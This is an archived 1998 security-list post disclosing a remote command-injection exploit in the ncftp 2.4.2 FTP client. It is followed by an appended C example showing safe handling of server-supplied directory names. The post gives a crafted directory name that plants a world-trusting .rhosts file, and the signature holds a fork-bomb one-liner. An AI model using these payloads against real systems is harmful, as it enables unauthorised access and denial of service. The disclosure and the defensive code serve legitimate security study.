[ http://www.rootshell.com/ ]

A vendor patch is available at http://www.ncftp.com/download/ (Ncftp 2.4.3)

From lcamtuf@boss.staszic.waw.pl Thu Mar 19 13:12:24 1998
Date: Thu, 19 Mar 1998 22:02:48 +0100 (CET)
From: Michal Zalewski
To: info@rootshell.com
Subject: ncftp attack exploit

Here's an ncftp 2.4.2 remote exploit. This time, I'm sure it hasn't been
reported before and it isn't patched.

Ok, how to exploit this vulnerability? First, you should create an evil
directory somewhere, deep in the ftp server directory tree:

[ftp@junk deeply]$ mkdir "\`echo -e \"echo + + >~\57.rhosts\">x;. x;rm -f x\`"

From now on, every attempt to download the directory structure with recursive
get (e.g. "get -R coolest_game_ever", that's one of the most popular ncftp
features) will cause remote execution of "echo + +>~/.rhosts". Simple and
pretty nice.

_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
To iterate is human, to recurse divine [P. Deutsch]
=--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
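
Added example, not part of the original post and not ncftp's code: the post does not say where ncftp 2.4.2 hands the directory name to a shell, so this C code assumes a client that creates local directories while mirroring a remote tree. The function names remote_name_is_safe and make_local_dir and the allowlist policy are hypothetical; the point is that a server-supplied name is validated and then passed to mkdir(2) directly, never through system() or popen().

```c
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

/* Returns 1 if a name from a remote listing may be used as one local path
 * component. Allowlist (this example's policy): alphanumerics and " ._+,-". */
int remote_name_is_safe(const char *name)
{
    size_t i, len = name ? strlen(name) : 0;

    if (len == 0 || len > 255 || name[0] == '-')
        return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && strchr(" ._+,-", c) == NULL)
            return 0;   /* rejects ` $ ; | & < > " ' \ / ~ and control bytes */
    }
    return 1;
}

/* Creates base/name with mkdir(2), so the name is never parsed by a shell.
 * Returns 0 on success or if the directory exists, -1 on any rejection. */
int make_local_dir(const char *base, const char *name)
{
    char path[4096];
    int n;
    if (base == NULL || !remote_name_is_safe(name)) {
        errno = EINVAL;
        return -1;
    }
    n = snprintf(path, sizeof(path), "%s/%s", base, name);
    if (n < 0 || (size_t)n >= sizeof(path))
        return -1;
    if (mkdir(path, 0755) != 0 && errno != EEXIST)
        return -1;
    return 0;
}

int main(void)
{
    /* Constructed sample names, not taken from a real listing. */
    const char *names[] = { "coolest_game_ever", "a`b`", "x;y", ".." };
    for (size_t i = 0; i < sizeof(names) / sizeof(names[0]); i++)
        printf("%-20s %s\n", names[i], remote_name_is_safe(names[i]) ? "ok" : "rejected");
    return 0;
}
```

The validator is defence in depth; the direct mkdir(2) call is what removes the shell from the path.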